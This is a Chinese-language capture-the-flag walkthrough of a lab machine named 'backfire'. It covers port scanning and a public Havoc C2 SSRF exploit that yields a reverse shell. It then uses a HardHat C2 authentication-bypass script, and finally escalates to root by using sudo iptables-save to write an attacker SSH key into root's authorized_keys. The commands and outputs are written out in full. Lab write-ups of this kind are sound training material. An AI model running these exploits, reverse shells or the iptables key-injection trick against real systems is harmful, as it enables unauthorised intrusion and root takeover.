系统:Linux
内容:havoc CVE,hasdcat CVE, iptables
扫描端口,发现3个。
~/D/b $auto_nmap.sh $IP
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u4 (protocol 2.0)
| ssh-hostkey:
| 256 7d:6b:ba:b6:25:48:77:ac:3a:a2:ef:ae:f5:1d:98:c4 (ECDSA)
|_ 256 be:f3:27:9e:c6:d6:29:27:7b:98:18:91:4e:97:25:99 (ED25519)
443/tcp open ssl/http nginx 1.22.1
| tls-alpn:
| http/1.1
| http/1.0
|_ http/0.9
|_ssl-date: TLS randomness does not represent time
|_http-server-header: nginx/1.22.1
| ssl-cert: Subject: commonName=127.0.0.1/organizationName=tech co/stateOrProvinceName=Florida/countryName=US
| Subject Alternative Name: IP Address:127.0.0.1
| Issuer: commonName=127.0.0.1/organizationName=tech co/stateOrProvinceName=Florida/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-12-15T08:39:10
| Not valid after: 2027-12-15T08:39:10
| MD5: f4d3:45cf:27fc:1c59:f657:a834:c8dc:772f
|_SHA-1: b52a:40ad:891e:fa53:f34d:fa6f:1f60:50ff:4c10:c994
|_http-title: 404 Not Found
8000/tcp open http nginx 1.22.1
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-title: Index of /
| http-ls: Volume /
| SIZE TIME FILENAME
| 1559 17-Dec-2024 11:31 disable_tls.patch
| 875 17-Dec-2024 11:34 havoc.yaotl
|_
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.22.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
8000端口下有两个文件,下载后发现是关于havoc框架的代码。搜索havoc相关的CVE,最后在下面的地址找到一个最方便的。
https://gist.github.com/pich4ya/bda16a3b2104bea411612f20d536174b
运行exp。
~/D/b $python3 havoc_ssrc2rc2.py --target https://$IP -l 10.10.16.11 --c2user ilya --c2pass 'CobaltStr1keSuckz!'
[***] Trying to register agent...
[***] Success!
[***] Trying to open socket on the teamserver...
[***] Success!
[***] Trying to write to the socket
[***] Success!
[***] Trying to write to the socket
[***] Success!
63157
[***] Trying to write to the socket
[***] Success!
[***] Trying to write to the socket
[***] Success!
[***] Trying to poll teamserver for socket output...
[***] Read socket output successfully!
本地监听的端口可以得到shell。
~/D/b $nc -nlvp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.49 52018
bash: cannot set terminal process group (75597): Inappropriate ioctl for device
bash: no job control in this shell
ilya@backfire:~/Havoc/payloads/Demon$ whoami
whoami
ilya
最初在ilya的.ssh目录下是有id_rsa的,后来再次登录没有了,只能上传id_rsa.pub,便于登录ssh。在用户目录下发现一段提示,估计就是要获得用户sergej的权限,需要利用hardhat c2相关的漏洞。
ilya@backfire:~$ ls -la
ls -la
total 44
drwx------ 6 ilya ilya 4096 Jan 19 05:00 .
drwxr-xr-x 4 root root 4096 Sep 28 20:05 ..
lrwxrwxrwx 1 root root 9 Dec 12 10:14 .bash_history -> /dev/null
-rw-r--r-- 1 ilya ilya 220 Sep 27 16:43 .bash_logout
-rw-r--r-- 1 ilya ilya 3526 Sep 27 16:43 .bashrc
drwxr-xr-x 2 root root 4096 Sep 30 07:39 files
-rw-r--r-- 1 root root 174 Sep 28 23:02 hardhat.txt
drwxr-xr-x 10 ilya ilya 4096 Sep 27 19:18 Havoc
drwxr-xr-x 3 ilya ilya 4096 Jan 19 05:00 .local
-rw-r--r-- 1 ilya ilya 807 Sep 27 16:43 .profile
drwxr-xr-x 2 ilya ilya 4096 Jan 19 22:06 .ssh
-rw-r----- 1 root ilya 33 Jan 19 03:39 user.txt
ilya@backfire:~$ cat hardhat.txt
Sergej said he installed HardHatC2 for testing and not made any changes to the defaults
I hope he prefers Havoc bcoz I don't wanna learn another C2 framework, also Go > C#
...
ilya@backfire:~/.ssh$ ls -la
ls -la
total 20
drwxr-xr-x 2 ilya ilya 4096 Jan 19 22:06 .
drwx------ 6 ilya ilya 4096 Jan 19 05:00 ..
-rw------- 1 ilya ilya 1956 Jan 19 22:08 authorized_keys
-rw------- 1 ilya ilya 3381 Jan 19 22:06 id_rsa
-rw-r--r-- 1 ilya ilya 739 Jan 19 22:06 id_rsa.pub
查看本机端口,7096和5000两个公开端口刚才是没有扫出来的。
ilya@backfire:/tmp$ netstat -ntulp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:8000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:40056 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8443 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:7096 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:5000 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
udp 0 0 0.0.0.0:68 0.0.0.0:*
由于能够登录ssh了,直接端口转发。
~/D/b $ssh -L 7096:127.0.0.1:7096 ilya@$IP
...
~/D/b $ssh -L 5000:127.0.0.1:5000 ilya@$IP
转发到本地后再次扫描这两个端口,果然是HardHat服务。
~/D/b $nmap -sV -sC -Pn -p5000,7096 127.0.0.1
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-20 06:07 CET
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000025s latency).
PORT STATE SERVICE VERSION
5000/tcp open ssl/http Microsoft Kestrel httpd
| ssl-cert: Subject: commonName=HardHat TeamServer
| Not valid before: 2025-01-20T04:50:04
|_Not valid after: 2030-01-20T04:50:04
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Kestrel
|_http-title: Site doesn't have a title.
7096/tcp open ssl/http Microsoft Kestrel httpd
|_http-trane-info: Problem with XML parsing of /evox/about
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Kestrel
| ssl-cert: Subject: commonName=HardHat Client
| Subject Alternative Name: DNS:localhost, IP Address:0.0.0.0
| Not valid before: 2024-09-29T00:38:50
|_Not valid after: 2029-09-29T00:38:50
在网上搜索,可以查到hardhat有个bypass auth的CVE。下载后运行,随后就在hardhat服务中建立了新用户,密码同用户名。
~/D/b $python3 auth_bypass.py -u kali
[+] User created !
[+] Use kali as the username and password to login in HardHat C2!
按如下路径,运行shell代码:Interact-->Terminal--> +
本地监听端口可以得到反弹shell。
~/D/b $rlwrap nc -nlvp 2234
Listening on 0.0.0.0 2234
Connection received on 10.10.11.49 38138
whoami
sergej
查看sudo -l。
sergej@backfire:~$ sudo -l
Matching Defaults entries for sergej on backfire:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User sergej may run the following commands on backfire:
(root) NOPASSWD: /usr/sbin/iptables
(root) NOPASSWD: /usr/sbin/iptables-save
这里要使用iptables写防火墙规则,在comment里加上pub_key的内容,再利用iptables-save功能覆盖root的authorized_keys来实现提权。本地生成的ssh key时,由于rsa的pub key过长,会被截断,要使用长度较短的ed25519算法。
本机生成key的命令如下。
~/D/b $ssh-keygen -t ed25519 -f ~/.ssh/id_ed25519
靶机运行sudo命令如下。
sergej@backfire:/tmp$ sudo /usr/sbin/iptables -A INPUT -i lo -j ACCEPT -m comment --comment $'\nssh-ed25519 <your pub key> kali@mykali\n'
sergej@backfire:/tmp$ sudo iptables-save -f /root/.ssh/authorized_keys
本机再次尝试登录ssh。
~/D/b $ssh -i ~/.ssh/id_ed25519 root@$IP
Linux backfire 6.1.0-29-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.123-1 (2025-01-02) x86_64
root@backfire:~# id;hostname
uid=0(root) gid=0(root) groups=0(root)
backfire